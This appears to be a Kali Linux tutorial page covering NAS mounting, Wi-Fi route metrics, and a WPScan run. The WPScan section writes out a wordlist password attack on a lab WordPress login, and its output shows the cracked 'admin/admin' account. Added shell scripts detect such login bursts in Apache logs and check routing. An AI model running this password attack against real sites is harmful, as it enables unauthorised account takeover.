$lsb_release -a
Distributor ID: Kali
Description:    Kali GNU/Linux Rolling
Release:        2020.1
Codename:       kali-rolling

By default, a Kali Linux live system has no persistent file system. To keep data from a live session, you need external storage such as a NAS (Network Attached Storage). The following mount.cifs command mounts a NAS share on the /mnt directory.

$sudo mount.cifs //192.168.0.10/home /mnt -o username=share-user
Password for share-user@//192.168.0.10/home: *******

where //192.168.0.10/home is the NAS IP address and shared directory, /mnt is the mount point, and “share-user” is the NAS account name.
Since the kali account does not have write permission on /mnt, writing to the mounted directory requires sudo.
$sudo cp foo.txt /mnt/
To unmount the mounted NAS shared directory, use the umount command.
$sudo umount /mnt
WPScan is a WordPress vulnerability scanner. WPScan is found in the Kali desktop menu 03:Web Application Analysis>Web Vulnerability Scanners.
The command below runs a password attack against a WordPress server (192.168.0.3/wordpress). The --passwords option requires a password file that contains the list of passwords to try during the attack.
One of the easiest ways to prepare the password file is to use the Openwall wordlists collection (https://download.openwall.net/). The command uses a file named “password” as its list of passwords, which was downloaded from the /pub/wordlists/passwords directory.
kali@kali:~$ wpscan --url 192.168.0.3/wordpress --passwords ./password
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.6
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.0.3/wordpress/
[+] Started: Mon Apr 25 00:00:00 20xx

Interesting Finding(s):

[+] http://192.168.0.3/wordpress/
 | Interesting Entry: Server: Apache/2.4.38 (Raspbian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://192.168.0.3/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://wordpress_ghost_scanner
 |  - https://wordpress_xmlrpc_dos
 |  - https://wordpress_xmlrpc_login
 |  - https://wordpress_pingback_access

[+] http://192.168.0.3/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.0.3/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://192.168.0.3/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4 identified (Latest, released on 2020-03-31).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.0.3/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.4'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.0.3/wordpress/, Match: 'WordPress 5.4'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups -: |=============================================|

[i] No Config Backups Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs -: |============================================|

[i] User(s) Identified:

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Performing password attack on Wp Login against 1 user/s
Progress: |=================================================
[SUCCESS] - admin / admin
Progress: |===============================================================|

[i] Valid Combinations Found:
 | Username: admin, Password: admin

[+] Finished: Mon Apr 25 00:00:00 20xx
[+] Requests Done: 2895
[+] Cached Requests: 5
[+] Data Sent: 1.42 MB
[+] Data Received: 16.047 MB
[+] Memory used: 132.027 MB
[+] Elapsed time: 00:02:43
The log shows that wpscan found the admin/admin account-password pair in 3 minutes.
Note: wpscan requires internet access to update its database. If the database server is unreachable, wpscan aborts.
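On the server side, the 2895 requests of this run show up in the web server's access log as a burst of POST requests to wp-login.php from a single client. The following is an added example, not part of the original page: it counts such requests per client per minute, assuming Apache combined log format; the function names, the threshold of 20 and the log lines are constructed for illustration.

```sh
#!/bin/sh
# Added example: spot a wp-login.php password attack in an Apache access log.
# Assumes combined log format; all log lines here are constructed samples.

# flag_login_bursts LOGFILE MIN
# Prints "IP MINUTE COUNT" for each client that sent at least MIN POST
# requests to wp-login.php within the same minute.
flag_login_bursts() {
    awk -v min="$2" '
        # $1 = client IP, $4 = [dd/Mon/yyyy:HH:MM:SS, $6 = "METHOD, $7 = path
        $6 == "\"POST" && $7 ~ /\/wp-login\.php(\?|$)/ {
            minute = substr($4, 2, 17)      # dd/Mon/yyyy:HH:MM
            hits[$1 " " minute]++
        }
        END { for (k in hits) if (hits[k] >= min) print k, hits[k] }
    ' "$1" | sort
}

# Constructed sample: 40 login POSTs in one minute from 192.168.0.2,
# and one ordinary login plus a page view from 192.168.0.7.
make_sample_log() {
    i=1
    while [ "$i" -le 40 ]; do
        printf '192.168.0.2 - - [01/Jan/2020:00:00:%02d +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 3456 "-" "-"\n' "$i"
        i=$((i + 1))
    done
    printf '%s\n' '192.168.0.7 - - [01/Jan/2020:00:01:00 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "-"'
    printf '%s\n' '192.168.0.7 - - [01/Jan/2020:00:01:02 +0000] "GET /wordpress/ HTTP/1.1" 200 9000 "-" "-"'
}

log=$(mktemp)
make_sample_log > "$log"
flag_login_bursts "$log" 20
rm -f "$log"
```

Only the client with 40 login attempts in one minute is reported; the single ordinary login stays below the threshold.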
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.6
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...

Scan Aborted: Unable to get https://data.wpscan.org/metadata.json.sha512 (Couldn't connect to server)

When Wi-Fi and Ethernet are both connected and Wi-Fi is the only way to access the internet, the default Kali Linux routing cannot reach the internet, because the Ethernet default route has the lower metric and is preferred. To access the internet on this system, the Wi-Fi metric value must be lower than the Ethernet metric value.
The metric value of a network device can be modified with the nmcli command.
The following commands change the Wi-Fi metric value from 600 to 50. After the change, Wi-Fi has the lower metric value and the system can access the internet.
# default network setting
kali@kali:$ ip r
default via 192.168.0.1 dev eth0 proto dhcp metric 100
default via 192.168.10.1 dev wlan0 proto dhcp metric 600
192.168.0.0/24 dev eth0 proto kernel scope link src 192.168.0.2 metric 100
192.168.10.0/24 dev wlan0 proto kernel scope link src 192.168.10.9 metric 600

# change wlan0 metric from 600 to 50
kali@kali:$ sudo nmcli connection modify access-point-name ipv4.route-metric 50
kali@kali:/mnt/tmp$ sudo nmcli connection up access-point-name
Connection successfully activated (D-Bus active path: /org/freedesktop/NetworkManager/ActiveConnection/5)

# current network setting
kali@kali:$ ip r
default via 192.168.10.1 dev wlan0 proto dhcp metric 50
default via 192.168.0.1 dev eth0 proto dhcp metric 100
192.168.0.0/24 dev eth0 proto kernel scope link src 192.168.0.2 metric 100
192.168.10.0/24 dev wlan0 proto kernel scope link src 192.168.10.9 metric 50
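
To confirm which interface actually wins before starting a scan, the `ip r` output can be checked mechanically. This is an added example, not part of the original page; the function names default_route_dev and uplink_is are hypothetical, and the sample routes are the default-route lines from the two listings above.

```sh
#!/bin/sh
# Added example: decide from `ip r` output which interface carries
# internet-bound traffic. Function names are hypothetical.

# default_route_dev: reads `ip r` output on stdin and prints the device of
# the default route with the lowest metric, which is the one the kernel uses.
default_route_dev() {
    awk '
        $1 == "default" {
            dev = ""; metric = 0      # no "metric" keyword means metric 0
            for (i = 2; i < NF; i++) {
                if ($i == "dev")    dev = $(i + 1)
                if ($i == "metric") metric = $(i + 1) + 0
            }
            if (!seen || metric < best) { seen = 1; best = metric; bestdev = dev }
        }
        END { if (seen) print bestdev; else exit 1 }
    '
}

# uplink_is DEV: succeeds only when DEV owns the preferred default route.
uplink_is() {
    [ "$(default_route_dev)" = "$1" ]
}

# Default routes copied from the two `ip r` listings above.
BEFORE='default via 192.168.0.1 dev eth0 proto dhcp metric 100
default via 192.168.10.1 dev wlan0 proto dhcp metric 600'
AFTER='default via 192.168.10.1 dev wlan0 proto dhcp metric 50
default via 192.168.0.1 dev eth0 proto dhcp metric 100'

for state in "$BEFORE" "$AFTER"; do
    if printf '%s\n' "$state" | uplink_is wlan0; then
        echo "wlan0 is the preferred uplink"
    else
        echo "preferred uplink is $(printf '%s\n' "$state" | default_route_dev), not wlan0"
    fi
done
```

On a live system the same check is `ip r | uplink_is wlan0`, which can gate a script that needs the wpscan database update to succeed.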